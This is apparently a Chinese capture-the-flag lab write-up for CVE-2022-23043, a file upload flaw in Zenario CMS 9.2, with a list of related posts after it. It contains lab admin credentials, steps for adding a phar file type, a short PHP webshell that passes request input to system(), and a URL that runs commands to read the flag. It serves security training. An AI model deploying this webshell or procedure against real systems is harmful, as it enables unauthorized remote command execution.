声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

靶场介绍

Zenario CMS 9.2 文件上传漏洞，攻击者可上传webshell执行任意命令。登陆信息：admin/adminqwe12

春秋云镜开启靶场：

http://47.95.3.91:13095/

开启靶场后需要先配置一下文档存放位置 （否则无法getshell）

http://47.95.3.91:13095/admin

admin/adminqwe12 登录后台

文档存放位置

都修改为/tmp

 修改好之后点击继续

/organizer.php#zenario__organizer/panels/start_page

访问http://47.95.3.91:13095/organizer.php#zenario__organizer/panels/start_page

Configuration--File/MIME Types

创建文件类型

格式为phar 类型为 text/plain 保存

 上传文档

 上传一个phar的木马文件

<?php
if($_REQUEST['s']) {system($_REQUEST['s']);} else phpinfo();
?>

上传文档 选择public

Actions---View public link

http://47.95.3.91:13095/public/downloads/E90cZ/123.phar?s=cat%20../../../../../../../flag

 成功获取flag

[春秋云镜]CVE-2022-23043相关推荐

1. 春秋云镜 CVE-2022-24223

   春秋云镜 CVE-2022-24223 AtomCMS SQL注入漏洞 靶标介绍 Elite Graphix Elite Cms是印度Elite Graphix公司的一个用 Php 语言编写的 Web ...

2. 春秋云镜wp day1

   春秋云镜wp day1 (qq.com) 建议关注公众号 websec.space,以后文章来csdn备份一份 今天看到之前买了内网渗透那本书,今天看到靶场上线了,打一天玩一下,总体cve的洞很好刷, ...

3. [春秋云镜]CVE-2022-23134

   声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Zabbix Sia Zabbix是拉脱 ...

4. [春秋云镜]CVE-2020-19960,CVE-2020-19961

   声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 zz cms 2019 存在sql注入漏 ...

5. 【春秋云镜 CVE-2022-30887wp】

   春秋云镜 CVE-2022-30887wp 开始愉快的打靶之旅吧 收集信息 任意文件上传 开始愉快的打靶之旅吧 春秋云镜链接 https://yunjing.ichunqiu.com 靶标介绍: 多语 ...

6. [春秋云镜]CVE-2022-2073

   声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Grav CMS 可以通过 Twig 来 ...

7. [春秋云镜]CVE-2022-24263

   声明:⽂中所涉及的技术.思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担.所有渗透都需获取授权! 靶场介绍 Hospital Management ...

8. 春秋云镜 CVE-2022-24112

   春秋云镜 CVE-2022-24112 Apache APISIX batch-requests SSRF RCE 漏洞 靶标介绍 Apache Apisix是美国阿帕奇(Apache)基金会的一个云 ...

9. 春秋云镜 CVE-2022-22947

   春秋云镜 CVE-2022-22947 Spring Cloud Gateway spel 远程代码执行 靶标介绍 Spring Cloud Gateway远程代码执行漏洞(CVE-2022-2294 ...

最新文章

1. asp.net利用Web Service实现短信发送致手机
2. 研究揭秘：神经网络越大、表现越好的“神秘力量”
3. VMware安装MacOSx系统
4. lucene4.7 高亮功能（八）
5. BufferedWriter 和 BufferedReader 的基本用法，附演示程序。以及一个复制文本文件的程序
6. 软件测试管理是什么？
7. android在线图标生成工具,图标在线生成工具Android Asset Studio的使用
8. Java项目集成工作流引擎解决方案及实例展示（前后分离版）
9. 欧美音乐史上最经典的歌曲
10. python36 +tkinter制作12306火车票查询系统
11. 26设计模式之建造者模式
12. jquery+ajx post/get 实例
13. #pragma warning 启用和禁用warning
14. SPA（单页面web应用）和MPA（多页面web应用）的区别
15. 《社交红利》读书总结--如何从微信微博QQ空间等社交网络带走海量用户、流量与收入...
16. 防黑客攻击手法之APP安全防护
17. node中的global对象
18. 使用pip安装pymqsql，出现Cannot unpack file xxx的问题的解决以及pip安装速度慢或出现readtime out问题的解决。
19. 量子计算机 郭光灿,郭光灿（中国科学院院士、量子信息学家）_百度百科
20. 实验四 面向对象的分析（软件工程）

热门文章

1. CentOS7安装软件
2. ADB连接android手机
3. 2017腾讯暑期实习-产品经理一面（群面）
4. matlab截取图像一部分
5. static全局变量与普通全局变量区别？static局部变量与普通局部变量区别？static函数与普通函数区别？
6. OLTP与 OLAP混合使用实例—TiDB
7. 选股策略二：用pandas pd.merge()进行类海龟法则选股
8. 子序列和子串问题算法的全面总结
9. 听说用这个7岁小孩都能编程-Google开源项目blockly
10. 媒体文件格式分析之FMP4